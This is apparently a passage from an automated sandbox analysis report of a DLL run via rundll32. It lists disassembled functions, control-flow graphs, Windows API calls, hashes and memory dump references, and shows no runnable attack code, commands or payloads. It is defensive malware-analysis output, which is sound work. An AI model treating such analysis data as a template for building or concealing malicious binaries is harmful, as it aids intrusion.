                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalSection$Initialize$Delete$Concurrency::cancel_current_task
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3610250894-0
                                                                                                                                            • Opcode ID: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
                                                                                                                                            • Instruction ID: 16dd56e71a98a8fe38ead4268d941e7a59e1ec6387c67001032f1325c4e9e75d
                                                                                                                                            • Opcode Fuzzy Hash: a877f73eb4a0cc73d247b8665ae12c0b89afea62d282fefbff238ad0fbcf9c11
                                                                                                                                            • Instruction Fuzzy Hash: 5ED17132405F8882E396CB20FD943D9B3E9FB9A790F51D21AD6DA42670DF78D698C740
                                                                                                                                            Function 00000001800EFF24 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 962 1800eff24-1800eff76 963 1800eff7c-1800eff7f 962->963 964 1800f0067 962->964 966 1800eff89-1800eff8c 963->966 967 1800eff81-1800eff84 963->967 965 1800f0069-1800f0085 964->965 968 1800f004c-1800f005f 966->968 969 1800eff92-1800effa1 966->969 967->965 968->964 970 1800effa3-1800effa6 969->970 971 1800effb1-1800effd0 LoadLibraryExW 969->971 972 1800effac 970->972 973 1800f00a6-1800f00b5 GetProcAddress 970->973 974 1800f0086-1800f009b 971->974 975 1800effd6-1800effdf GetLastError 971->975 976 1800f0038-1800f003f 972->976 978 1800f00b7-1800f00de 973->978 979 1800f0045 973->979 974->973 977 1800f009d-1800f00a0 FreeLibrary 974->977 980 1800f0026-1800f0030 975->980 981 1800effe1-1800efff8 call 1800e7f94 975->981 976->969 976->979 977->973 978->965 979->968 980->976 981->980 984 1800efffa-1800f000e call 1800e7f94 981->984 984->980 987 1800f0010-1800f0024 LoadLibraryExW 984->987 987->974 987->980
                                                                                                                                            APIs
                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00A0
                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00000001800F0774,?,?,?,?,00000001800DB89A), ref: 00000001800F00AC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                            • Opcode ID: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                            • Instruction ID: 9e20b040cd1b5661f49696f8373896ce597b257fd6a3f0defee87b89056d177f
                                                                                                                                            • Opcode Fuzzy Hash: bb80c46524efd334e0948ec5fde6f5b3acf71997aa830e5d0c0555cb348075c0
                                                                                                                                            • Instruction Fuzzy Hash: 0F41E032311A4886EB97CB16A8087E62391BB4DBE0F59D129BD0D577D4EE39CA4D9300
                                                                                                                                            Function 000000018001F5C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93libraryCOMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 988 18001f5c0-18001f5e8 989 18001f76a 988->989 990 18001f5ee-18001f5f6 988->990 991 18001f76f-18001f789 call 1800d5000 989->991 990->989 992 18001f5fc-18001f631 QueryActCtxW 990->992 992->991 994 18001f637-18001f63f 992->994 996 18001f645-18001f65e 994->996 997 18001f709-18001f720 994->997 996->991 1000 18001f664-18001f67f GetModuleFileNameW 996->1000 997->989 1001 18001f722-18001f74d 997->1001 1000->991 1002 18001f685-18001f68a 1000->1002 1006 18001f75d-18001f762 1001->1006 1007 18001f74f-18001f75c LoadLibraryW 1001->1007 1003 18001f69c-18001f6e6 1002->1003 1004 18001f68c-18001f697 SetLastError 1002->1004 1003->997 1009 18001f6e8-18001f6f7 GetLastError 1003->1009 1004->991 1006->989 1007->1006 1010 18001f701-18001f704 1009->1010 1011 18001f6f9-18001f6ff 1009->1011 1010->997 1011->991 1011->1010
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$FileLibraryLoadModuleNameQuery
                                                                                                                                            • String ID: Comctl32.dll$p
                                                                                                                                            • API String ID: 3104332706-195350848
                                                                                                                                            • Opcode ID: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                            • Instruction ID: 3af2e9fca6f2b8a444c29f43d75c3359d6cbe81a64a43693d8330885b9170935
                                                                                                                                            • Opcode Fuzzy Hash: 34a2f0dbdd0e6ac07f7eb668994bf4ee3323e02dc5c56a4663ff06c3d7fa56c0
                                                                                                                                            • Instruction Fuzzy Hash: C4413231218F4886F7A19B15F4983EA73A5F749BA4F908225E69D427E4DF7DC64CCB00
                                                                                                                                            Function 00000001800DC260 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 494COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                            • String ID: f$p$p
                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                            • Opcode ID: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                            • Instruction ID: 96a00a691172ba3443d11c4982911cf9766be878af63e4870790c223ab62484d
                                                                                                                                            • Opcode Fuzzy Hash: ed79370b00d8e8658ded3e492e09794217c34b99c512f83fb9569cde87e5cc5f
                                                                                                                                            • Instruction Fuzzy Hash: A712947260424B86FBA65B14E054BFD72A1F7487D0FD8C215FA9147AC4DF38C6889F26
                                                                                                                                            Function 0000000180099C70 Relevance: 10.8, APIs: 7, Instructions: 284COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalInitializeSection$Concurrency::cancel_current_task$CreateSemaphore
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1489690303-0
                                                                                                                                            • Opcode ID: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
                                                                                                                                            • Instruction ID: bacc5767debf166278b71937d87c4d40db06fba7c828773fc2802f3724ac9812
                                                                                                                                            • Opcode Fuzzy Hash: 073037f3f5bcf2f7dd3c5580214dcea6dca69115b8242414d5a9b36cdc0c840b
                                                                                                                                            • Instruction Fuzzy Hash: 15E1F532201F849AE7968F24E8843CD77B8F749758F519229DB9D53B64EF38C6A9C340
                                                                                                                                            Function 00000001800D4C5C Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                            Download Yara Rule

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1376 1800d4c5c-1800d4c98 1377 1800d4c9a-1800d4cad call 1800ed81c 1376->1377 1378 1800d4cb1-1800d4cda MultiByteToWideChar 1376->1378 1377->1378 1385 1800d4caf 1377->1385 1380 1800d4d8d 1378->1380 1381 1800d4ce0-1800d4cf3 1378->1381 1384 1800d4d8f-1800d4db4 call 1800d5000 1380->1384 1381->1380 1383 1800d4cf9-1800d4d0a 1381->1383 1386 1800d4d0c-1800d4d13 1383->1386 1387 1800d4d36-1800d4d47 call 1800db928 1383->1387 1385->1378 1390 1800d4d15 1386->1390 1391 1800d4d18-1800d4d2c call 1800d61b0 1386->1391 1395 1800d4d49 1387->1395 1396 1800d4d53-1800d4d56 1387->1396 1390->1391 1391->1380 1400 1800d4d2e-1800d4d34 1391->1400 1398 1800d4d4f 1395->1398 1396->1380 1399 1800d4d58-1800d4d7a MultiByteToWideChar 1396->1399 1398->1396 1401 1800d4d7c-1800d4d86 1399->1401 1402 1800d4db5-1800d4de4 LCMapStringEx 1399->1402 1400->1398 1401->1380 1403 1800d4d88 call 1800db930 1401->1403 1402->1401 1404 1800d4de6-1800d4dee 1402->1404 1403->1380 1405 1800d4df0-1800d4df5 1404->1405 1406 1800d4e57-1800d4e6a 1404->1406 1408 1800d4dfb-1800d4e00 1405->1408 1409 1800d4f67-1800d4f6b 1405->1409 1406->1409 1410 1800d4e70-1800d4e73 1406->1410 1408->1409 1411 1800d4e06-1800d4e36 LCMapStringEx 1408->1411 1414 1800d4f71 1409->1414 1412 1800d4eaa-1800d4eb8 call 1800db928 1410->1412 1413 1800d4e75-1800d4e7c 1410->1413 1411->1409 1417 1800d4e3c-1800d4e49 1411->1417 1425 1800d4eba 1412->1425 1426 1800d4ec4-1800d4ec7 1412->1426 1418 1800d4e7e 1413->1418 1419 1800d4e88-1800d4e9c call 1800d61b0 1413->1419 1415 1800d4f78-1800d4f7a 1414->1415 1416 1800d4f73 call 1800db930 1414->1416 1415->1384 1416->1415 1417->1415 1422 1800d4e4f-1800d4e52 1417->1422 1418->1419 1419->1409 1430 1800d4ea2-1800d4ea8 1419->1430 1422->1416 1428 1800d4ec0 1425->1428 1426->1409 1429 1800d4ecd-1800d4efe LCMapStringEx 1426->1429 1428->1426 1431 1800d4f00-1800d4f0b 1429->1431 1432 1800d4f1a-1800d4f31 1429->1432 1430->1428 1433 1800d4f0d call 1800db930 1431->1433 1434 1800d4f12-1800d4f18 1431->1434 1435 1800d4f3e-1800d4f46 1432->1435 1436 1800d4f33-1800d4f3c 1432->1436 1433->1434 1434->1414 1438 1800d4f4b-1800d4f60 WideCharToMultiByte 1435->1438 1436->1438 1438->1409 1439 1800d4f62 call 1800db930 1438->1439 1439->1409
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiStringWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2829165498-0
                                                                                                                                            • Opcode ID: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                            • Instruction ID: 5a97a349b29dd6e7b5ac608a3e284f06584119dc4d9a85b610e319804b2a6361
                                                                                                                                            • Opcode Fuzzy Hash: 44485f7753f9c64bca2118c71e251ed8770b17291ac18f0f18f66950d9041ec7
                                                                                                                                            • Instruction Fuzzy Hash: D091727360078486EBE68F2594403ADB2E5F748BE8F548725FE594BBD4DF38C6098710
                                                                                                                                            Function 000000018003CD60 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                            • Opcode ID: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                            • Instruction ID: 61791d6681c3f4ad3dfa316d05c0a73c09026118eba7547e925a0575426d869f
                                                                                                                                            • Opcode Fuzzy Hash: 24677e321ac5ee4d1a04d18d3265de91d17da8cb2206eb616759a8d8e1f823ff
                                                                                                                                            • Instruction Fuzzy Hash: E231A236205A0882EAD39B65F8843DAB761E78C7E0F15C125FE98477E6DE7CC6498700
                                                                                                                                            Function 0000000180041C10 Relevance: 9.1, APIs: 6, Instructions: 70COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2081738530-0
                                                                                                                                            • Opcode ID: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                            • Instruction ID: 3e18f53febbc17cc81b0eea23b64b476764291fb2201fd083bcd6cee7e18a8ac
                                                                                                                                            • Opcode Fuzzy Hash: dd0db9ab5b724912ec2026415335d458f002f1e7d8cb1aaf0fdef404c58ad89a
                                                                                                                                            • Instruction Fuzzy Hash: 99217F36201E0845EA929B65E8C43E96362F78CBE5F45C225BE1C477F6DF68C649C704
                                                                                                                                            Function 00000001800EFC6C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFC7B
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCB1
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCDE
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFCEF
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD00
                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00000001800DBEA5,?,?,?,?,00000001800EEDB7,?,?,00000000,00000001800EFD8A,?,?,?), ref: 00000001800EFD1B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                            • Opcode ID: 29bc101356f84d96952e9b6f46aeae41848f5e669d7c67a18c62fb47cf68ff97
                                                                                                                                            • Instruction ID: 534ee9dd9013db177466b5afa872c7489071b3bf08e507150bf2a31af924fab8
                                                                                                                                            • Opcode Fuzzy Hash: 29bc101356f84d96952e9b6f46aeae41848f5e669d7c67a18c62fb47cf68ff97
                                                                                                                                            • Instruction Fuzzy Hash: 06116D3430468C42FAEB67316A953FD52425F4C7F0F65C728B93657BD6DE28DA499300
                                                                                                                                            Function 00000001800297E0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 216COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 2967684691-1405518554
                                                                                                                                            • Opcode ID: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                            • Instruction ID: 257ebd258958192414c0201136383fc5e51e53a75ac9e0a2a349a042fac65805
                                                                                                                                            • Opcode Fuzzy Hash: 492b9f12d2017c85e3b9038361cbb09bb50bf92a85eee2bc8d229eea44332673
                                                                                                                                            • Instruction Fuzzy Hash: 86919F33705B888AFB92CF64D4903ED77A1EB887C4F048129EE891BA99DF34C659D350
                                                                                                                                            Function 000000018001C340 Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_exception_destroy
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2138705365-0
                                                                                                                                            • Opcode ID: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                            • Instruction ID: 212c56f00f68a2ef71f83bc1973b783350eb29f8722c30a54f44c08f54aa4c97
                                                                                                                                            • Opcode Fuzzy Hash: e6622a1003ff05e1210d2c7c0291edc59dcda77f184723c5f9fea43b66e241c3
                                                                                                                                            • Instruction Fuzzy Hash: 8B81CF72614F8885EB528F25E45039D7360F789BE4F409216FB9C03BAAEF78C698C744
                                                                                                                                            Function 00000001800EFD34 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD53
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD72
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFD9A
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDAB
                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800DB982,?,?,?,00000001800DD477,?,?,00000000,00000001800EF007), ref: 00000001800EFDBC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Value
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                            • Opcode ID: 5fa853c1108a3c10bac684210e7d34fd4d35b52258afac04cb1d23d354d3a8e4
                                                                                                                                            • Instruction ID: ff9aa437c0595ea1eb9d58ea7ad14249b49a3c0f1692886f92c925acf78205b5
                                                                                                                                            • Opcode Fuzzy Hash: 5fa853c1108a3c10bac684210e7d34fd4d35b52258afac04cb1d23d354d3a8e4
                                                                                                                                            • Instruction Fuzzy Hash: 40118B3030868D42FAEAA3216D513F962474F8C3F0F55C328B9396ABD6DE28CF499300
                                                                                                                                            Function 00000001800420E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 131COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 2775327233-1405518554
                                                                                                                                            • Opcode ID: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
                                                                                                                                            • Instruction ID: 9e5a5e08860c88efdfc9631ff2a57989cd1dbfec02a922697c63f09b54788598
                                                                                                                                            • Opcode Fuzzy Hash: 5b311788567aa043f92aba488ebe8b2e5c9052ebe229d9d5e94981fd2abaa2a8
